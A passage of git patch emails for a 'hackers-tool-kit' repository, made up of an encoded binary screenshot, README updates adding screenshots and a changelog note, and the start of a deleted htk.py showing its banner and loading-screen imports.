zU1qY}lN6Eyb{lmj@Ygg%@GLAXtpVwc7=tM)Du!z~uaHgvW)jB}o3tfk zur*p&QJ~!LZC_ZG zF+5EL#>EJbEXx6nkp<8j0Y@`au%py!PM0laj3|(ZzZ$BfYh;uGM2!Vd9W>gHH7`#h z=)l$}4ZJ*Nz(tMbu=*-I2ACr!roQXjN98`?V+p8eXzTfxj(-Fu>ARl>R%o@ria3#+ zp(_{S@y%c_njK&aw$E5nJbfwvUbm23Q(CH=S94MB23BMZ$Suq^!Vqxs37wapeM?PU z_2oZH0^cl1sX1Gqhn)kCb6#%Eh4X~dQXDR?b0L{TWTKjRnGj$GEh}~b4kc_C>`Z{G z(8Q*j641DBfUCLpN%QQbe5yom0|x(i+OBq7*2o*$4 zEemknOaMCvcJ6+@ra9QtlQ?ExAqiAK2@0*MKHCvL2b(iD6uTOHF^0jWw+g$Q5;$?T zv8idb`gB9y)HHi%XUBFSOlcJqu~+(?DrVbp`2gLzt)-<0Z0|^%p4K`CyI_XEj<2Cf z_piSN$^x6jjzRRa2YTQU z54KpY58185rBWgHa@W>Srht}$LcqFGQIOQ7b1sAhUnD4pyEH%5lBdw4hF z>jFr|lkuG5aI%G}%MWjgu=0gT+a5pe|8pDpOKq%L(Pz(%qD`Omwz+MmSr3MbhrD6^ z27Pz~(Xi!nOvP(^pJuZMsk&4rVAw7SU*8lhz#4n1{Sgy@#POiI617&e{%Pxk^q;;6 zYhz*mlu)byZ8AmY@cJ=Eo8_YjwHOxfQ!F~#uqw>AKb{R@<;ZMbbD>Txu|`2WDUB{P z#pNvSCer1HnC~L3OOu%=emtC6V&w#n!nnjUmZrX?o-`Pzw`|&XY%f|XMo_$+xAi8E zr!(k$hNCMZVw(AKt{=&uaeJOjD$|wu5X+!yV2!aVj2Uq+hn>~0ryhjjDwe(-Y!%i+LTN3r7_+T9^_zZ=9A}5Z`)o{*z39=B^0>PlQ&%P2SBmw>;;5@Dl zzOVoBl5=I=Rm zY@52zut5)gVr5c}_U5eBP}-k8*L!n8E?Iqo^Nsd6?s-V+zM}-<_Gx#xwDZkkb1QAj z(+zrdc4rmqMm(4AQs|4t8yr{884baAPrHS<*4YCL0fjV_Rc0vhgE`EY6F<#-2FAR23{$yFGY&^80 zOe)tg8FbTE+pT$XbLcxEGJ7HkOE(d1-nc6a=7|B9>Tcn=_t*((YFhLvRani1)#upV zM^R>V@U}Qj!n1N3Nky4%y%!5njkO~jE-E$FyMqSnA4jwyFqQlrRZ9klb`FqmUfkqz z%NQ#A9Hp~?cF0yQ6)Pd%mR(w1PXii4)@ude%HAW1k}UcnK(|aS2J2zWYVUBLGU(^6 zn=XYhX3vbxvsX&+5mzJPgxL3gsX>~8ggaBTnQ%>Io9P-;YEC0%a>knL91#1~$0>32 z^h&>s9%1o1+q-C*6v%gFzD4E?;my6{C#ncNu143nSGa$rZ_PltIPNs2(94|k`C{TG zxQR9HrL}yCYEv$j3#MeQ@Xw%bhntC!E zNb#;ZFkODF%IQZL5$zE9%*sPTh?%IA`}lLjS}Y5qh?={TUqd>l)vF_58e4Buu?eh^ zzZ$jMm#C%@aWn<>^~4yfhYeo=_5;P z_g)t~Ow~+kna8oN7*mKoS4`-sbiV1C*7;+wOM*K28|4JLHstw%n_#tibh;!dhG?p7?P^m%eS8dL$!g3ID%JTLg@H`xmvmtRXqGr`TUHr=?w?{_qdBd#;u)|(-sd;5% zsznwP4XBbWG777lAt~=O+I3k}Am3+hJ5Ypp7bHU5mx0p4Z458{)S=zKkT!762QtS#l0-!J+2{`^_zzQyy zn<)bK{yXAA(g5jK?AO1{DlcxcVKKpZ2zfzHw@zhiS;K2)Cw2?)QE& zD(Ag*^X}ieb;}zvjrn&l?i|?kQ6ehCUym9qimBjF3vEzua;adQj*>4W8{Nh{Z-Bx` zQ))LI>IL%TsM#P4iO0nY;M1(4vh79XiF?SJz+@mX~d4$x%?pL6g#bII>*nHuW@^0jXEz{(%fSMqpX%ucRl9HNG#5wrKz2#4Y z`}-HToc!OMp2+?scj5`n(*qB~oCDyYNobziYaROI&o6zy6&Coz_$?#(GaxPp|9!7)pDbm zKsdbI3lCx*(<{vdKL@5X;<8I$X8gU7A0fAJcVfC<2F6;U|vK~y>;WDd81fyFk*q~ zSMd4+rSCJM$jvE+KeN}cxJ+XY+_y^irj|Zb zJb1AG?C@{Rt|})(^zjJK8``Wiyrxr^fcgT4y+W}jEvcQKjG-CQJI^|6e+{93db=c^!JD3}{9N6hjH+7c!?2F;Jck6uF!q z?wwV0geG&SAfDGTG4vI*3mg+fy;PF>0vdrEh}nvNKRdk1IPh2L$4`29P?fscYvcr! zv+?H^?XbJGSSVY9X&g)nUcQyDh~EE|6=1}DaFqjjVR%Do?~-My7Y7;QbPf@M7|k;r zqdc#gM(LTA&L|Ncux!o#a?p|L12&LS&63e5&NLa!XY-|asa<3oQAV`k;x8~No(pqFFe56<`6gPSd0GUr^1&8P{@~t+6b6uwegztI5$`Ulj`-eII)_wb{FZI^%sp&$^&b22)82TrteM;Vi@)H zBOz=5IO^PYRvw^E_+s^3Nd{_x5AS{Gw2CbQ4!nW2oFM+FX33J+x-8MZN?sOfPpVF+9>41^!W8%c6RLJ5Nf&g z7{t$8#LcBnT(Kph-^QlCkib2Lt#UNJ(Jl|F8w6Qx0krE|?FiW@9(ojDa@Wdm;MgJa zq;`pF{K!GnTr{MSF!hL19C!zf*CvUv5Fx4y)1pk&66ZG-f6R8Va0RV2OV`I;Mhf%# z=R$#T#NyNU%Z$a~CXS%%{8yUGp?=)|2-MT&Tq=CvA|6Nyf38~@x)!2Xm*D!Hph+}DPEbvoR=xCF0L@tcNa$*5}d zm%|HU>p{g95ZbCKOZYN^VBdH-Mf}TYmtf{-!XV6rXOd%b{!y57v5!=_@+rTw>i#zu ztauiPXn{o#$f)=APAkhDEQUGFXTAOKIn|Fh`N@>bqGr?R!dOX0mtt#X|3rCXhu#QW z2h9=WL$%T!*8q0?7~bnoS&HGcGJ$L*<5cZ#YK$v)1Jsm@gh?ol$JIdQMu25;9w@AN zWx2!7XQdZ1X(LF$Jh{v%mN&+@0(+Rjbf^Q_7C!!~p56QEQ8` z@@=;-uKmeFmhX=(RJr`<0@irZLxxrHad8O*VoWc9+-kK3|2>nx zKQ+{svZKC9O$L1tp+opJCOY z@bD{ywAoiCKfCit_wL8l!b{6ZeJq1>wcJ%XQs~-i95l_EPWIpMS?R7xRcjeLh`032 zw*r2mnu&YgFeq90paMUUcppSD$>X#uQZec2`&Q=@m|z97NHQAT)eXc=dcUGX!QdL% zmOpIIr6>>m7Jz9A0eD44Z1=YvFBur*xgh8Wg)UWCm=A?tzzSo*&cJA#uo`)cZBRvAW|yIB1D)<7o14kwc{Xvg3Gw(Jczj|VX4;T|&Ipi6E=rK`3i?&7`$ z3Q!e63&(;hk@Ec5FpHEJ_>HDiP(MbU(_~}Yfl6bSY-!RDr$ddkOO z$rpq*FK6ZKEZgs1NHv;F&V#A)!dXLTDmnXK<{rBco_${(=kGyCeRUjt`0uAT1OT8x zWncf5@G4zD@r9$ywXIYDA-qbS$&@6cKpwINe4nV?z_N-M&l>I^rk+VR9)NMsP?DL# zd1-(<;H00*IoWY_PYoozZB1g*G3!#ezmhdDG`jvfadQ&@3R_+WaE95mH<>qL5|qqZ z>4Z{aGk`bE1TiFt*F#bO4vp;7-2N6r$)@3fcT-yH#Onv>@KJck!_ksul>cn)NAG5Z zs0r_|Q8PLDphJ(#0bD7!F!|Xprt}Dp7zdMGI~W8P!N5-g;F@akARm3nZG7|a{iNPs zX1*a;(W^HbF2$gU@eQ^x{hGlUXN$Lv7l@}{S^|*&s73dVOl?q7CVl(9Vcr$k7+4H~ zSWKW7Wa1tm)mam{NFzL#%`h-oPWc4c8xbGf?(0^Fs*nYSSSF~!1|N-PV@My!;DUWc zh5tu@#={fK=%C&t`oB$c>O|gTnwD^W_Oo8T=B+b?v%7@D!hC%NjdJk%_t=`0;THF7yHfPli|%<+mJf|>$`{-6<_ zQ2^t$KYl!%j5*^Dtn2>BBc*guQ4p?ZHICqXs_;3?8)hcCA4cd6CXpnbA3lrI((pKj z&)6tCoFwYTJKoXG;`^-ZL$)9CepP9hbxI9lnneK6KlDN1IY(JiC|j)YxLHm!blvPv zk1*`BzfOVJ31kO)ENbU*s6Dhfol=}xepvG&2Zk8Gq0sHldxKP+ZWaAsBMVX$4q9FX zvboG#!hI2|!Cp=7?!atzFfC0J@zB|49g@nA!LBYBTa$=fwCYnm)rq>q$@Opa zP?4nV6@b<)7yma~cf!`y<$xK*BN&|A1rPgY$> zNf{(^N39p~+$HS3xtvnipxq=L(+DPgs$eu#rb(O2MbJ9+93)}gj68rh2gn8P93Sq% zPrzwn*dKWG>IWoOfXe;9o>m6Ajd=OReQ)`Lqh70rr`^-Kk64|buvTmk%z6rjxz9R|>9;7EeTCQ|#>OSnE- zuZc|RgCBa5=rxse+f;xw%UV5p;_^ymUE41qUjcv*dW9%$Dv*@fZpExjOOwlSG%05Q zm`Q{S07p4Ew5n3+0Fu@Qrx=Cub4ifu2vq}(Zw+SKT&vG~!Z_K1z)iM(0yx~#|34zI z4j-~Q&P70ite1b2!dAIFVBUST*MdbY%(-p?)gM2%@{p)EAi^y-q+2tLmL|2v968P7 z@64PK25iiAA2bM5B^MDzzWXZdOfc7pKy^I=;HJOX(myV%kHBQiA?&fK@;84y_x1Zq zn(_1?fCd62E7@yb#K!KtCrlz4N=u?TLVuwE1WGg{E46Ub0?F$g(AyB88M}rSR)cL1 zu~+R7B$Y%Luqd_ck=gc9H(m}ZtNfZAQqUYpV%QG@VJkfFf*zAI-z!*UNa_b^OskTmaNL6=L`0 zh;%>KrJF8QFsa_a3jHCoEl(c-!h5Gp-b_%IOL$xT_IK2CZjS)OEc0iP1VG#@D)v{I za&A)r{`kZx@RDNtHLd`77|Qflh4P3SVHG$iEiu9GK>%q|Q&NX*vcPYdPO1BUt6d`s z*0lnd02!PmdqZJjnF4?lfW<9Am!MAm&akaR6Aijmu$%I8;hI&wi_fMWJOqw zZwL`aI>7yu~l@LAvD2X1)l9w;e-^rW-PSjay%_oLDUlOR9{aN(4%b(!SB z2z>J25)YFKRzy7{b{!NKfsuet--TUni8e}B$_SEcJ_pw2p!z%!V3=odxYO+a4G-FP zFoutH`U!pjB7a3f((1XwcHj`s)$w2I{r{N-@Nd7KQ=I4D!s6BruIayOj2G_UU0G&a z0_{}rC8MEUa`Z<+{03L0@e>3p5nPZdQXI4_bqWGaYeLG^C4a=N0`ANRhC%v2%aLVO zRX;M7LG^-!l5CELR6;$K*J3;``l~5`7P%@nABl$487kKAQNx2FbB7qPXglptL~|aK z&A@Cdzmzz6sYj!h0Z{8edjp8oX~1A25MeW884xh}>u1p%Fn~agRMhGby~2FUN}Ky7 zBg}1|51Bhe5B4^V8qpL-8N8lF1g-;O6jG<90FSk7Cgo-JS`OZ36|64HBK^mZwtD~( zLkrN)fZTTZrPYuzK(01=HnOS0K}}BURV9EqGJ!vWqc1~2hM*WdsNnwUZ#Y16SV1%6 zv4Oh#BqC`?S|$b@2_&L2W9k8r|8J!jWzu(t0xZ%0b-_CVN?0?JYvaEaK#|I|SjKeW zro@yxwVBqy?guEVX9BP{L_w)oX+~6j>~2<$fwsoLGyNDY>9VC4ttKN7;0~o)|?V6=5F*p|lj(LH|NteM80G+xFTg6u; zmJAPO#cPRh#5rU@L8&(>Z@Y$Deyv7UIc(kvQ=qk2N%zie$f(1H5&(6DcS>4-D<3vO z7zz(Jt)Te>hlfZE_x~kbMRYAO@XC+yg`y(GG5ot9L1I9%0*(ak^D}d@at|DE5jSah zy!})2MEc*7Q^dtr7t}ue?y~#le0>qqJ&iFD`!mY(X@3qO;3 zAliSzt*#}5_xMR71VdVGI{-P8`b`Rq2rAD1hHX5LGi*aOok%@uc^IF>Xw9WyK(1Vw z_S>gHOUvK`)2J*LH#SxMf+Xq17(UXMdA$6RST0@ijq$sC2{qD#TaGTirIV@&yWO9A z59zrj@6w&Wl1-lMp>;6d+>X4kAI$GB1jA#+f0L54+1VFckbEB9O~C$*!eWhw6`$v1 zwA^<4J73fi#^JXTex;h@?l5ubwb0`f&s{EHJ>cXSq!R&vx}ck1_|B4Pkf<5@leE6Y z82(Nfk+IzWWB~}eZD9{C|AHLIYrn;^US_R&X;K+=eMbF=H`l%A`GS~fJo8>&Le3o{ z?UUY1*IefAQ<)lf$Gq1h_B4z46!UU;QwpQjY@5o643Ez%Y}fW%%Xh>#)zCyf zN+u_aPOrHvkda@4CT7!T7A=k#iHV}_i1YDR8^7PEF!5L9tCnW&o=Pm*j94jamLBG0 z{^|_Py+t&V)oL@emR8diPNKe7)fvrWP^AG~lgWb@aJR64x9qubRpw@jrUB>=sP>f$ zy1=V^A|XBr$2UMpE1l&u=K%X}C_w>)^60KR+3ZG(CNz?xM<2sR)za2uanE)3UznY& ze@~VE7(^l@qzsqC>MFzZX4a`P%XC}}x)9>F#X)>91m1&7vgHu!62rk=Z>~3kDQ(1( zz{-^uwRWs* z@?sc`*H*LKFaOE1OxMfvliaz>9U3FYAZvbZC2IGWXI^!uR_4`gqC~E5lCUsfy$5lu zC)==uEU@guuJp1YUux{)b5GsgrrG44nfYiy%~eZmHab2lk*{dxVXg%RZuSq+XWEWU zjEt65yyh<>%Mf1ckNWyB4NSeFo3fG++lbW!dvu^XpNp~rh;epl}Yb?!lpxnmp{6~k( z2I+6Ro$xWPBMD%@>FI=Ua^!C~#>l17b0K5@N;k_uAV4jA z-2@)Cb(P9h$L1MSfh=(hLxhHXmlvk~Znk4feuVozbTu3DgF{6kA-NYDmb|X+K7>d8 zgx})Iq)Nv3znLHRicC1}e>hn4ZA4j)+t=f|+>!obzv$w8W^uY-B22c{kr5n{lDVoM zr8CrmU+_9iINElOK(mnFZME#(fmLPH+EP?<;ohvHy3?FuXZaSfWE_6(&-d}LdRFX| zk2u=VUl?Dh6%z!LK=94`qS?jvyma`?p$mFxD}yB%8QJvZyq+mE+t2e3Q~q9yRdp%K1CCl|9A zr;Bk|&~`Ch&4K)cQ#(ax?Bfw5Q)BDzlbX!(m#Xq9F`H*QS^P|uxJ&+`Go#-#^3Scr zKdHqOpqs3wSc>*FClC&S#fj_UHnT2eGe162)wJG_5c#f>EdQ?PxS)X$7Ly-f*!J@o zp&4&n`xEkLldh58lL_8A+hHg->#Dzl?F?2-p^3D*OHE04!=tK6(v^UOlx08CJLRjX zInhPS#FFv%Cs%r(^leYMS4Oq#G8uNpke-}3l$9?TB=3)o3YNo^M#|TQ6aqEdfYX_R z*L(Q@&j(&0rvPr(ucV4b$;`UTfZ-+OG#<}e6yBtc(?~n0s^zL5rrJvQKRGn)?T^#-53nVb5&!z113S6XG z+of8-8d&R1+uc7tFphIK_m}2$VIB_56B|fKXzMpI!7y6dP@S+meKJ88PgCU>3FJPc zVEHBVq>JW!>GRu()6)sqxip_zqEi6@E-v0vQ9rw1EEdHLX>XT0jDnp{tC&Rl5{R(# zO0i?;E-uK<*TSB6#=wFaU9B&}So0EJxSyZ86&023UkGE3#wg_(#bI*vH@#myXJy`> zzl06P)l9DRb3FbeD_BoMm1k+R(zu=Z%O;-eGtt*R>j?Z_VFz@J@i!UF7kK<+q_4Vp z-OATJ$&i2fixJ^v2C@+y7}Ht25+;l*nEk#)PfLZtUbNJ&W^+9I%I32Knw+3c)}*RZ zCQ$Was7lW1#rIPVV*9R`;nUBac{uFjdN&@csfL3YHL3#?tx%-`FW~t zCnvQkV*pZACyF=555wJ|hGz5;Qj100hx)R%DUzBSM_j`|Uo>ECunxS<@YSWmjiAQ2 z3Zu(1=Ns`>C;M?ad!Mj`@49cAQ7F~bp+GnLZt{M&&dXH}N&G4(RaH=Zc9YnhmX1u| zmLHxTgUFM(Cux*6!zK>qarUsB{t|j@=hqx?3RD!^hdqFUzC9!RL)#QEd>q^h)BC3x1nI26_kmn7ReM#>oMg`s{I)@jYsA1f>4}()7o$~ss_eTVpC+O zFcX!O0|y;-R7GcUR2@}7{Dqbhu`jwVFJNwWeD+v|p0-gSyX1J~@xzg0Myaw5Fk4@z zTmAjI`!0|V{~f)$1ztHp!K##E7Ry?H10i!UGSrhHjHs%toHE4Vr@JlA`A@7ASPTx% zqC!tV%=qFN3P+`df9^k12p_c?Iji>dtNJ(^yN5zJImYn!2>$%C1~1v)xHfXi{||9Y>N&3S(3eb-QnI3zMNr1?PraJuIl+u5GA zzFm7|e5`w!HbJ%h^%?DwF4CIbB5W{)1x&~CF>w1>t(d~|p+aa6qWWzJW7 zwJwxx(=ynP;C%;52P~T`iPpU%IgA^F?-v(YS1)2gWju{Q6bq&S(?vec`sU<6m>;w~MzSo^a{hRbGeTHuSd@Bgd{8 z%lD6mnwFL-_xJ+BlB)mZl57(FYeyAlgLe*PTO5Z36a;ra6UG5q|Ttv`)d zs@b%{V6e~mIX7er+THNmpTMhSI(5`Z26o{5OwVSCFWHFK)m6l*sfzs>sL;y$IX)4~ zt@;!LMF)i0Hu|Yd#ky~+;Ye2ezA-|!%&SfV5Pb}WYofv z4d36e*QY89&e+k6{GB<#c@8Uwc^!|ikAxRJo#3|2qtX6g$^oq%h%FogMJ&)v7o_}T z*q}aUzlT$4!Br*cR*^LpEIS(k0(x++sBmDkEwso6te7`FP`(XAUWZD3K{>$Tc4rpP zQLL5|rnpp4n|GeG7I{M@O}uapFms{%Rs)P8AH93FH=)Gr191r}OW(njS(7?jL_MC5*EB>|!_1Xe`^^-uQbJ`Afmv3A7*TV}yi`@Vg zLhin-LwS?SXP*Y4BRe}2))*i%K{!ZNK=E4kPC1avj+e;OoC;guc$$IXeUs6fo-+^s zCb6SSnSS7qei1ihHlLJMnA=pWSVHSsu2dTmbX(&~ocJfQ0iS)2tBF0=pLP~DUpKd{ zJd^hi#!^j-4+t+T68>R`?CJXFA@6DdQVM~J+{aZYq7)-Ztw@aA&owgPhb>K2qzd3A zlKJ4dlaE~pfQvj7uDLmv(lnJ+j*WId(Rf{%qxbw2;ksv(LmG{&!C$<8ulChV@app5 zhhN?JVmd?dtDatY_RF5RBsnM8?gn&&;k;Y6U#+}}c*m`thl!6J_yapMYc7+!2U3ae zcKpFy%Vh+zk3b?VVevu|S@{cZ*Pwp?RGJE7Z; zDiZ_J%7-(H!-O!STeMr<)&5z(E)TH`yO#qm9A3Lf3XRr36|z%#3Qab3eHPg==BgkZD}70nDM(fTS1(`zvLt5c$7did)p z9RC(Ubip}#aUwQW3cNV#nu1=B7kaGMw0sV(g%Iq~8sBZ$lj?6!p+|mG$g;3sBHpaY z%gsH67mdp9#gE<+A>jKuI31-$j%oBo8LFyi;)W7wc5ZN`48h$_u2sPcIPm6T!=6>H zg3C}MO*D5bTi8Y$TNQCO5hw5W1}>Eq5l|r|6!`A3J!Ebwzd;x_k+(!C;fJ_jg49F{ zE>T+KQ2LXi$hEw+Yu+kU8bjbnBJ(*0G+GqGvbL^(-=B2N1Z#*{>oLRIQYu)}vbG|w z5j==P9=Ic9JknWlIddxqe}W!p}{h(o}^jwWFAW(-aGyPSH41z`#r->#ybd@?|l> zz9a$DFq6j^%4C=BLbyGcSrk7&hKt3l6v!P~C7=9E+i&hSoBZk!kM5j8S|RGQJ1Yos zke2~JlGFAim+?(lDb>L#l6R6nFFu?JX-H<}b?@4nQ#ZTR>oiwy7^_!e7NpE}B$-w@ zw6YAB17?MBI|=nJ>SAXx0)YUrpbIuqP|xP(>o}oGpH+t>WZ5zQaj&AZdd3VEuKW1Ck|T!(+gt!rGWF(o$5kXliwj z23RR&_NU+ILE@Mog?xw&j_YeOP5?`%UysNXt|y{?zHS5kjXCZIvfZ0`LxGr3w7;*j zVAf84%@G|oh_9X(zniKWI zYIJ?zV1{W)tuoBi&%~4&8#^8({vj)*S zuI1Klg{M4wPVFE^yF1iP#KP5!5kH0cMa?YJ!JFPE8mV?i8W2BW9}sh4Y;j6^iMeHb zRqh*a%-L0u8S=;GR94+&0HlG^cp^u{#o9X&vFt zO9oL&*XY62XmE~B#QvUm2@@ zw5YnfFsQ`>Y_qBcy_<_Wq%bpYuD~#=w}o<1wudP?5pLQy zmpIgyolo;M$WwMvI|D1LQ9XI6#as!A{^Z1aP6Veq^wSI<#{c9kOMxCdKmFuzRXKY8K5G%f-(3FACXdFCR1G*;>*|4i)!iM32m z&YLjfpb@)f)*f5NqujKgM%Ezu8G|UEzd6h4&ZfHPv%w|g5T9Ueb4sxSdUj-1*^4!8 z!dmDf)GgH1FLr5Cig8}7jHJBjRzyJvRG{$Uxc%m|&pnh$KbUf&)GGEdEXljYwG2(J-;tQMZ^QFLkX?`j1|k$|9;6@)8-AR;H2F(X4wj{R?i`v6qvt zqBt~zbUwYfV_XaKy*cow;kx|;T2c9v{ieM@k&P#U_UOl$xW0#aNm$$U!ts99u_dsQ z5Q8ctlSQ%4OaLW2ZM~2d^g+dP-=Y0+GVV`$g4p8os}RzRxo_m=10F*_3oh5IfBh!_ z+$bkI_8mad;o}VHB__7eUynlt`Pat2!lMylVpNyzh<)QuhGbo^i<=%aGnr_dU?raF z7y^$-8N{YgB_#T4)CaVRTD>#ziq6neU&w>Pk2vUCK3#AzdI6{E;o0Ki-uoI)b=MNv zLT+cIceJM-ES|;WTiS1S?E-#u8fALQ_~y;wASP?7w=$UeY>j2>(R{VA>qUR!s|G{r zBF`K0YdMqL{EW?7gShjzhEvPRE=de7^Y+Ada%bV({t4!h<=1qq+?FtZlcj+YGg@+u z(8<2|g1IuYfLR43JByhu+t#R~9=dSacyXtPkIzg|d^Z3Tr3UWfU{(7FWABWDV&d!l zOL>=i2P*jaw6R=OLE+5utXYHJ9dT)j2pf`c1(ssqk@FCiKC$oT8d!{#w9SJrvG+qX#sWADWx|Nue91k8~4sHI@nZf`&B^8$0$!I0W@AK2CKS&P7h?i^6Kdh0weJEbZ@Gv3-Af@92&CC$6r2xu zI+R{DiI$MmOL-jUVwf{(Hr5fB1_0{rPte};FQ(Y5XH$mxuC?Myuvf%SIMCO!gnzv3 z+z;smoaCdPK^*3S$C`Nn128)dB1h|pX@Wbak*l+?QtgADxMzJh85Kdj7Fj(3s1-OF ztrHa?1LWmifrFj5*Fa2_2Y96OYHp&JYCTYg@}xD+wd|68nFKuNWQ&eCQipzm3cCIL zAkbN(oF)jmhsXeo?gj$G*4~l<*X!=pR4@lyn>62s&q~UqbWL@CC%S9&154MmR7UDh z-!=tg&Dzv}R_v;ozY z(VtZbxea=D(KFo=(tUV(O;P)^=OsxcQ2fS94U;3kKNV$~k!L_#HkiL{>``sp+`dr_ z6tngF_eKJ45Zku(eYkkkxBz&v3UQ^{I00CsS}yobt;w8q{*Jq>=y*m3{9D)=CtN8V z*i4q}JAU0`3?#|Y``;W@6804kG5kkhB!~QfIYIFE^5x5|Gzt`GYu9f0giluh_yQra z)XbZn^@Z8_S!<~6=bnJGi&+gmhQYZ2s@-N@PHv^~l!yne0l#k8L}NZ@4V3fJZ=TDy z{#MPMXypVdK91!8Sp%|x0sn!nNk|Vf8uLLnsk@=!V>ZW2!^Y|0|2um?6_9?&!kfpj zyEvu;vBRSYnl+($kOA<_d#WofGSl;r13LI(VwJkD6ROMF7siD4Y-)=`7L>q_;{Un; zBvQtSDOVgPDYEKs+od(Xu&qe_NJd#B+1W3|jB92eSVnzj9{vhjB-0sm`7_ z8K4~3C+|o8^n0+_@ajVlNsNh=*2`eZuJAU7(*13%`Nyzg-3<7nHe!ul&^)QXHZn;L zn6~~VhA`@y0_e1-65tNn#p1F=1(SIyes$;zOYo_h4q#Z&wN5QgV>N0*AB6OG{1IHR zat&zNwk|zcv!$!K8=`js)&Ks;V_3J<8=8F}s^zqR57WMaYBj*Mj%6lTFb0;w%QjVP zWxAB4w1pLl^|?g|@^?-Or&+gyB88Z9U~q5CrGMae@RB|aTHct z+nECzGD{N*h3XMF08V208kz*}*}Z+$vw%fGS~>t}>2}$rQ`|Kp^6(_Ip)ha9TLk~m z`M~Ef$3Z{9wXRU`_wMa~0{C^9Zsgy`673i%I;MUWrY$ESOl7OCc{xXp_Zja7Aa^zl zv~pIwqI9_r%%cpcyU9GF)HiF^s;P5>Z&)(-Nu7bj_T{*-LH zY)UpcTK=hjeTKBEe#WM{qlBd)S)T<@AWMh>z>Sd3;h{``%JGpiBiXWfzRiPQn1dRn zfLRb;j!DM}8cG!v!a)t6>ogeSm<-6HioGoW+!+Jydr{FnhkM3kW5Xlq&<>DmGb#!nW*!jqy_s;@<3Ycnu0h0j@pJZ!a_oK zSKv>>)id}9xtENMZ-lzH_tQK?BTJGnU>C=Rh;tHvko+y>_2%t*{)E0h#aA@lcmA*Y_b8J6xNy)uoH0TaKw5Zf?& zxPJ@dSqed9y6&#pijehy>yxnZL39DP{lUP~?&R^5+R76!-+tLLimu_h4OQ0!m-91~?321|OHc0J2xU|llMq>Lm_UZg5orD_wXD|LgSee?P z_rCL9HEM_cm*B@fByeI16>l>RpH>MF=#%jBe-P}$pRX&c6}_o_Iw;F#JDonR%?lzq zixX^1Ijj6OW;inaH*$;oJmNW1LM&!``bWm+!`A+lmTV+p;Pxt_ziZ!hoOjO?-kwk} zFG~CE!+-&9fXFZS^GV-@rorI)eNZ0uPktt*O)heH6#ax6!e}h7l|p=vxY62(01!jX z{!@hhgN`8D_Fo#*hLvV6|22;d=^F(yFU z{~;N8=dA@$4o6HL57dJTr4;pWtJ+i<}#3RlHMFU7~v{UPNSp%^@jL|%YUhg|IjHuhF~$jRz>mWyGzd3h59=6zPRt)lAj8C zT&vQOZ+#euUCL>4s{jX_Z`Gq)M`4iZ#1xvbGLo-PXE6m)0)2cbnT6!*;GW^#{{%?= zH^Jwh`}6MS5ZOIe9?I@F36Zk!1+Slsleu?6eqPSR;{Hv;T4&dgVa5f4bC$C^S^uR6z3a$_j_NuO4N=Z1&$R9Q zeuYf%Vol&&ZmZEf-r4z=*;)N3qRCOwfIwgTSM#+`Am*o(`A&v^H#)wZfC8mxJjsSd zQYS-tbZP4WR&9I-I7z(FMS$ETtsC6M)YH|Sf3+K<&1SPr-YQPT)ql7Qyj!^xI{cja z_}XGGA4Ds$D3cRET5oA7_VV|qIfV@+hjS;SF&(gtxQ%rTYCS+?mDF|h^@XpMC7tX! zu|aXPXDNZa;`_+gARi8{#?3Ru!pl8{rKF58g?l_V!0W&@a+PO$ffo!VM8NfXkbgH4 b3!=~5#*be4t)uS=^u5VRixVZsU9bK>bf;VI literal 0 HcmV?d00001 From c5bc629c03e6a14111ea0cd12cac5d17a304ae4b Mon Sep 17 00:00:00 2001 From: unkn0wn_bali <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Wed, 8 May 2019 01:18:07 +0100 Subject: [PATCH 105/214] Update README.md --- README.md | 10 ++++++++++ 1 file changed, 10 insertions(+) diff --git a/README.md b/README.md index 3413707..0bc47a8 100644 --- a/README.md +++ b/README.md @@ -8,6 +8,16 @@ my instagram @tuf_unkn0wn ![](tools/screenshot2.png) ![](tools/screenshot3.png) + +![](tools/screenshot3.5.png) + +![](tools/screenshot4.png) + +![](tools/screenshot5.png) + +![](tools/screenshot6.png) + +![](tools/screenshot7.png) # install * `git clone https://github.com/unkn0wnh4ckr/hackers-tool-kit` From 002b03725f0a958c0d9c96a4f06df8bbc19698c8 Mon Sep 17 00:00:00 2001 From: unkn0wn_bali <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Wed, 8 May 2019 01:19:32 +0100 Subject: [PATCH 106/214] Update README.md --- README.md | 2 ++ 1 file changed, 2 insertions(+) diff --git a/README.md b/README.md index 0bc47a8..fffaf8f 100644 --- a/README.md +++ b/README.md @@ -53,3 +53,5 @@ this is where i will try to put the most recent updates * added a option to start a server via apache * added a clearall and a run option + +* everytime you run the script it will switch randomly between different banners From cfd21d73cd15035cc941a7adc4366a0d624bfe5d Mon Sep 17 00:00:00 2001 From: unkn0wn_bali <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Thu, 9 May 2019 02:13:57 +0100 Subject: [PATCH 107/214] Delete htk.py --- htk.py | 2623 -------------------------------------------------------- 1 file changed, 2623 deletions(-) delete mode 100644 htk.py diff --git a/htk.py b/htk.py deleted file mode 100644 index 93cfc6f..0000000 --- a/htk.py +++ /dev/null @@ -1,2623 +0,0 @@ -#!/usr/local/bin/python -# coding: latin-1 -#if you use this code give me credit @unkn0wn_bali -#i do not give you permission to show / edit this script without my credit -#to ask questions or report a problem message me on instagram @unkn0wn_bali -""" - - - ██░ ██ ▄▄▄ ▄████▄ ██ ▄█▀▓█████ ▓█████▄ -▓██░ ██▒▒████▄ ▒██▀ ▀█ ██▄█▒ ▓█ ▀ ▒██▀ ██▌ -▒██▀▀██░▒██ ▀█▄ ▒▓█ ▄ ▓███▄░ ▒███ ░██ █▌ -░▓█ ░██ ░██▄▄▄▄██ ▒▓▓▄ ▄██▒▓██ █▄ ▒▓█ ▄ ░▓█▄ ▌ -░▓█▒░██▓ ▓█ ▓██▒▒ ▓███▀ ░▒██▒ █▄░▒████▒░▒████▓ - ▒ ░░▒░▒ ▒▒ ▓▒█░░ ░▒ ▒ ░▒ ▒▒ ▓▒░░ ▒░ ░ ▒▒▓ ▒ - ▒ ░▒░ ░ ▒ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░ ░ ░ ░ ▒ ▒ - ░ ░░ ░ ░ ▒ ░ ░ ░░ ░ ░ ░ ░ ░ - ░ ░ ░ ░ ░░ ░ ░ ░ ░ ░ ░ - ░ ░ - - -""" -#this is the loading screen \ the imports START# -#----------------------------------------------# -import os -print "Starting hackers-tool-kit... [ * ]-[0%]" -import platform -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[5%]" -import webbrowser -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[9%]" -import hashlib -os.system("clear") -print "Starting hackers-tool-kit... [* 